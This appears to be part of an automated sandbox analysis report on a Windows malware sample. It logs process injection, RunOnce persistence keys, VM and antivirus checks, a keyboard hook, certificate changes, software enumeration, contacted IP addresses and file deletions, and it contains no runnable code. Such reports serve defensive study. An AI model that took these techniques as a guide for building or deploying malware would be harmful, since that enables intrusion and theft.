RegOpenKeyExW May 23, 2021, 10:29 a.m.	regkey_r: {d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x0000025c key_handle: 0x00000264 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1	0
RegOpenKeyExA May 23, 2021, 10:28 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1		2
RegOpenKeyExA May 23, 2021, 10:28 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1		2
RegOpenKeyExA May 23, 2021, 10:28 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1 base_handle: 0x80000001 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1		2
RegOpenKeyExA May 23, 2021, 10:28 a.m.	regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00000008 regkey: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1		2

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe /VERYSILENT
cmdline	"C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe" /VERYSILENT
cmdline	"C:\Users\test22\AppData\Local\Temp\is-SF1FM.tmp\irecord.tmp" /SL5="$3601A8,6139911,56832,C:\Program Files\Internet Explorer\UYTTXGEVIT\irecord.exe" /VERYSILENT

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	SELECT * FROM Win32_Processor

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: 086c46c62048c263b82028b2fb5885bc00bc41d3

Communicates with host for which no DNS query was performed (2 events)

host	172.217.25.14
host	87.251.71.193

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory May 23, 2021, 10:28 a.m.	process_identifier: 1912 region_size: 114688 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000290	1	0	0

Checks for the presence of known windows from debuggers and forensic tools (1 event)

Time & API	Arguments	Status	Return	Repeated
FindWindowA May 23, 2021, 10:27 a.m.	class_name: ConsoleWindowClass window_name:	1	5505850	0

Installs itself for autorun at Windows startup (2 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover				reg_value	"C:\Program Files (x86)\Reference Assemblies\Tyshineqashe.exe"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover				reg_value	"C:\Program Files (x86)\Picture Lab\Guleqishaedi.exe"

Creates or sets a registry key to a long series of bytes, possibly to store a binary or malware config (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExW May 23, 2021, 10:27 a.m.	key_handle: 0x00000124 regkey_r: 1 reg_type: 3 (REG_BINARY) value: ÁÕx4XÁåH<PÁýPwËoÜØ_µHÅµ¾HÅ¼«HcáA@Å±4^¯fZÅÊC@K°h·?ËjètM=ãK£¹áü÷¶Ãc~¹²$ ?xÃ{aLÇs°Íh$ÏüsEø½ç@tPAÊ]ù¸003ú6)Ã{¸ÍE´H±Æ·¹ÎMÅÉ`tÃ]ÁÍ`dÁÂGÅh»ÿ^ßptÃE&÷3áù¸HÃE¾(Ã×x\|ÃçHD(ÃÿPL ËGôqÃ çÁÕx<Åh,]ÅáHñÉm,Àe-Ã!E`3èâ.DDHîçLLLHÃÛHTÇÙB]ÆÉr}ÈEÏû~I#\|·@NRÆPÉ7¼BÉÌüp:ò2z½ÃÎòÿ)øTK¸ÀL½ThÃÞêúÎRÖ±¼ÃÄº[B!ãË·=ÊhêtªÀ4³pºÊúQiJó±x`AnóÁÏXNÛÅûrEN±½J¶<ÇÓyc¤c1~"yò8zBaj ;»¾ÊÊe©3vJÃÏ¸£@ÊÂUUJËCØJÓrêÞ7µÎ&JÂsëß!¦Aø.@\|2~oNÇH<>Î±~¦$ËÍÏJKP{û´®ÉÌ@p·OÁN±¾I¶?Âû¹y`§eXXJ>==>§"ÍÅ K¸ûòÁ#ÀL¼eIOfïÕBE´kWÅÀL[ß±¿À Æ¹X@#ãÛ·>Ëiët^õ;¡Ñï§±·ÅÀ8/]÷©¿ìOÃI)é1óÃ¸ÔðHÉEÀ_ËoÄÀûí·ËkáAËGìëÁÕx,]ËoÜxÃrrQcõ;Q!ïFáü÷¶ÁÍ`À6#F²$ ?xÃc9,F;ÂÁ ¬LÇkTAFð¾õz4ÇsGRFR¹Á ¤èu`·ÁÍ`lÇckx»3t4ó)¼V¸õZf_>s~²½ f_>r+KtÅ Hsâ«§T½nEt}½<u¶{¸ fãÁz(bÃA²z(vÄHðf_}zaÑàK¸óz8JÁ¹ úBZÉÜPLÈE´VkÄÊE:øÌþ¶JÑËBéarë¬ÔúÏÇr}~ñÅß¢»Ïßjjgá¾5FÒÊI¶µoù´'zó»OqÀAÊJxrCIÊÈGENHC;áÑÂÀÖsiÌÄ¶üËCJ¶ÚáêNLÏZÊkét¾ojn_¾øù@Aù¸00AÊYáú6ÃSÍEÏ_%»ÏÏzjÃ\ÃC¾(vúN¸^"wr8u:Èäh¸rÅÁÊJÚE´VgÎJÖEÀE´aTÊZÒHÅKKÔ¾(vú¯'Bî]WR8t²ÇçHõZf_:wweïK+GèEHKøÂ>sv7°EÏ D}¶;´HÅOÇPgto»NÏÉFEBË¼ý½AÊKËkà@9¤/³UE¾EwÁÇBMJ¸¶¸¹ððAN¸w¦Eâx¹ f]ú´dKÀaðJÇOMHÊBÃOfÿ¡¹vúBÉFLKÓ[NÏÉFEBË½ÖïÇ/¬EÏHÅ¹7EÏÅBHÏå~XKÈÏ{¼Oè§Oð«pmvúÇk¨ÍEÏü¾Êb¤t7z3ÂEÎr±ÃXÂGÍW«\| ¸e9ìOËAÀJKÐ,k°¤EvúÍEÏÄ½´Â+g·:Çv´&äHÆ;{u0\|Ê÷ËEÒEµôÍÇ/¬LÇçHdÏ' EÀE´S¬#¤E´iCðâ¿«ÇOÇH+éB¾ÁÖouvóKôW`Ã@KøºÌýq])(REµhXvóóáÃ@4(äáù¸HÃ@¾+=OZtMÃ×xT8ËGôq:kX°¶§qÍ 666Ûqïpí âÓGúåÐ¥ð"+\|x¤àF cûËN ÊDLZ`` xû @Aåæà!@PNðö ðÀMx805Nv ðíFDÆÌ{z/îççÿçõtL) Æ8åÆS'çÔVÁJLCNÕÁ1àÖ:úÁÖÁ:¾ ÉÇÀúøú:NãíDTÇÏÕÏÝ ÜÇº<ÜÃIÞËÒåÇwÞTRÀTû{¢lÇ\ÃäÿommXËoì(À_Fñ3úÉEvóóáÁ]A\|kÀÀÒÀèê/ #KÅ»Î\|QBòL#Gìè)ÇSÌÎâåííÆ`¥ÏÀ He}ðàçñä!"âæéâ4óàhÁú²l/p>HÃÉ¬¦âáôZNàû8Àòñê àé)ÃB©+Àfïé,ÀÃåê.åÿûCu8(xHáHhÃóô"öÁÌE « À8c+à¨ÅÙp«=»b+´êïséA©®ãZ!:ìÈ¹QÃÆMHsþ%DÛu{I<MYþàiôæèhé®ÎmèDl»jîïG¶ñ=Éô_A/Ùè(ÁéB¨êkyñãçüöÚóN©ác(ýå6ááú¯ê>®ÇNJØE´d°Ì7BÄú4 ³¼E@@(µ,qÌiÈÃ'u <y5¥hêüè\@á_d}vÁÕ\$,@ÁåH4XHýP<PÁõX,(av((hÅïÃ)HÃRDR©ê´%ÈHÕá²ab1ÞKàëPÙÊÅö#HXÁâ;0`8µøU"dï"+À'öÐ+(Cà·ß§»2ÐáIÁÎÿPý<ha©%!Fm+Ë ÌßõÎ'}bwHËmït´ÃdHX,ÇÿPd@HÃ÷XlÁ KÁH`ïD ®!@!`ÇD©¸2 âXE51 !ÇDæbB_ ! '_ÍÅÃ×\$xËGäaTÉ!Ãv¶þQÃñÄ¥ó5Âu\|·"¸!IÃD':ßLAY.æÑiEH<9xß±tQ¦KI Ãë9dPÌ"'!ÈÂyÏê (¿ÀÛ ³~qVù°_¿ó÷óÕÄó«z3@@00ÀÓI5ÿaö;:¡º tNÊñyêó`²Âù~çïü´±ïC³ùü41øÈ0Fj»±,Ä÷PhPÃµËyà¶ÂOç` ½ÖsbFÑBÏéìt¼YGPïêÊ^óE·ê¿FPB+y]\±çv?·Ú+×êê;äQj¨9®MÊà¸ÃaZ£flñÆDµe»¯\|XÌzsôÌÇÈKµ!PutÃ^/cÀÃÇëÈ´~ÕW¬o0ozSm0Èß»êöó<.º¥+hµÊA>$ûÃÅÍ-ÚvÀkGx£Dh)_!¾ÑêWÓEµsMB]ß¤HHD(ÅÉF&DPt`dÁCW1?/v`A6ÈDgoká<G=:I7//h4HÁ ¶Eô[z³À³;ÅÂwâÂÄ¤Ã¬ê§´r6P³µtRò®øÆ¶u[xtÅÒ~AgsPßG)[@öæÈû º ½uÃÌOAI@ÃápSRTÃ[ÃÄ©ÈþUÖôóÄH+4o\|ÉËv³2°QCÄ§êÂKÄ¯êCÛH@}[3ÁÇT@#/Ì<}¶,Q\íáõãE)s÷ç#ÁâO\|³ÙáªÐzØBD~ôKù@/$E h(ÃãJ @3F¾âvÅpPñåS+ÈókH{ê¢#Rg çê ¢²ÔP6òÄïº¡âzi[wû´îççUÍùqr`kÒònTLZrOíAfË+{$HØ ¢)KjÞW8o}µoà¡@ËoÌ2ËÙAÅÁhrÓ~û üôEÏU\|§»ýÃd71F¢é F'-µ W¿Â0ôïìÉ~³4mÊC+JkI¨_Æ»?pE´ùç °Ú¿Ãbføê·¹» LD·!AHþûû¿ÔGû»K7@ÇÜÀâsQÀúCwÆñ³à¥-óÂz¸£c{¼ÇiªÃbi >8¹-MÍzðAAÊkk/rA¶¯ÀÒSEMòkUÈõtÍªìBGù»±¦d8z±.9ÃÎE0\|Ç@Ä¸úe(EÎMÁÍ`øÂ_Å vô÷ñ,÷Æ2³3÷Õýªg"`xòÑÎu`ZÁõáBÈ@#xÿmñ4xD,Ü®Vi4EzB¨ÔL(^N¤¦¢ÚÜÙzÌ(wPò¸~tE"§5ý{n°}ðY¨8!Tÿ[M÷ÀrML7àÍÏ¹êGðóÊ OÁ1+Ã±¶uÿ$#¥îSG{$§Þ¶+ºÀªÉ´6ó*ãÅÌeõÁ½yÏÜWÂZ8çZF$=JÁÅh¼[ÐHÁ"'êÇ YÅí(¸¹A"{BFü¤T´Å²¸;"¶\\By({È:HÐp4K¹6Å5J;æàEwß¥ÃJÌ¨FöL½pLh£CÂ»ðøµæùàU2zù@5q7ó+î´µÅáýÉÏ-aØ@Uv×Æ)O4x<ë¢_eX,lEabFoê regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{LJU50KX1-5I52-VT6Q-WSWM-U2Z9XL21ZV61}\1	1	0	0

Executes one or more WMI queries (8 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT * FROM AntiSpyWareProuct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory May 23, 2021, 10:28 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELûµà0Prc @ À¯@ cOÜ` c H.textN P `.rsrcÜT@@.reloc \@B base_address: 0x00400000 process_identifier: 1912 process_handle: 0x00000290	1	1
WriteProcessMemory May 23, 2021, 10:28 a.m.	buffer: P8hÜLL4VS_VERSION_INFO½ïþ?DVarFileInfo$Translation°¬StringFileInfo000004b0,FileDescription 0FileVersion0.0.0.0: InternalNameBreaming.exe(LegalCopyright B OriginalFilenameBreaming.exe4ProductVersion0.0.0.08Assembly Version0.0.0.0ìêï»¿<?xml version="1.0" encoding="UTF-8" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3"> <requestedExecutionLevel level="asInvoker" uiAccess="false"/> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x00418000 process_identifier: 1912 process_handle: 0x00000290	1	1
WriteProcessMemory May 23, 2021, 10:28 a.m.	buffer: `t3 base_address: 0x0041a000 process_identifier: 1912 process_handle: 0x00000290	1	1
WriteProcessMemory May 23, 2021, 10:28 a.m.	buffer: @ base_address: 0x7efde008 process_identifier: 1912 process_handle: 0x00000290	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory May 23, 2021, 10:28 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELûµà0Prc @ À¯@ cOÜ` c H.textN P `.rsrcÜT@@.reloc \@B base_address: 0x00400000 process_identifier: 1912 process_handle: 0x00000290	1	1	0

Collects information about installed applications (32 events)

Time & API	Arguments	Status
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Versium Research 10 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Versium Research 10\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Picture Lab version 2.1 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{141446C4-F423-40A0-BB37-10245CF8EAB5}_is1\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: recording version 3.5 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{558E1E6C-4A0D-4F49-9F39-071618575B7F}_is1\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Access MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Excel MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office PowerPoint MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Publisher MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Outlook MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Word MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proof (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office IME (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office InfoPath MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OneNote MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove MUI (English) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Groove Setup Metadata MUI (Korean) 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW May 23, 2021, 10:29 a.m.	key_handle: 0x00000264 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1

Creates a windows hook that monitors keyboard input (keylogger) (1 event)

Time & API	Arguments	Status	Return	Repeated
SetWindowsHookExW May 23, 2021, 10:21 a.m.	thread_identifier: 0 callback_function: 0x00000000ffcdae10 hook_identifier: 13 (WH_KEYBOARD_LL) module_address: 0x00000000ffc30000	1	1049725	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3468 called NtSetContextThread to modify thread in remote process 1912
NtSetContextThread May 23, 2021, 10:28 a.m.	registers.eip: 2000355780 registers.esp: 3800636 registers.edi: 0 registers.eax: 4285298 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000028c process_identifier: 1912	1	0	0

Deletes a large number of files from the system indicative of ransomware, wiper malware or system destruction (50 out of 100 events)

file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\_isetup\_setup64.tmp
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\4_177039.exe
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-9E85G.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-T3D23.tmp\Versium.tmp
file	C:\Users\Public\Desktop\Picture Lab.lnk
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picture Lab.url
file	C:\Users\Public\Desktop\Picture Lab.pif
file	C:\Users\Public\Desktop\Picture Lab.url
file	C:\Users\test22\AppData\Local\Temp\is-5R3UN.tmp\_isetup\_setup64.tmp
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picture Lab.pif
file	C:\Users\test22\AppData\Local\Temp\is-5R3UN.tmp\_isetup\_shfoldr.dll
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Picture Lab.lnk
file	C:\Users\test22\AppData\Local\Temp\is-HLUV2.tmp\LabPicV3.tmp
file	C:\Users\Public\Desktop\recording.lnk
file	C:\Program Files (x86)\recording\unins000.exe
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\recording.pif
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\recording.url
file	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\recording.lnk
file	C:\Users\Public\Desktop\recording.url
file	C:\Users\Public\Desktop\recording.pif
file	C:\Users\test22\AppData\Local\Temp\install.dat
file	C:\Users\test22\AppData\Local\Temp\is-G0C0S.tmp\prolab.tmp
file	C:\Users\test22\AppData\Local\Temp\fj4ghga23_fsa.txt
file	C:\Users\test22\AppData\Local\Temp\jfiag3g_gg.exe
file	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\enterprisesec.config.cch.7804.37082531
file	C:\Users\test22\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\64bit\security.config.cch.7804.37082859
file	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\security.config.cch.7804.37082515
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\3316505.exe
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\_isetup\_setup64.tmp
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\_isetup\_shfoldr.dll
file	C:\Users\test22\AppData\Local\Temp\is-LVB8H.tmp\idp.dll
file	C:\Users\test22\AppData\Local\Temp\is-OI7OR.tmp\lylal220.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\0.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\temp_0.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\20.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\5.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\15.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\7.tmp
file	C:\Users\test22\AppData\Local\Temp\$inst\8.tmp
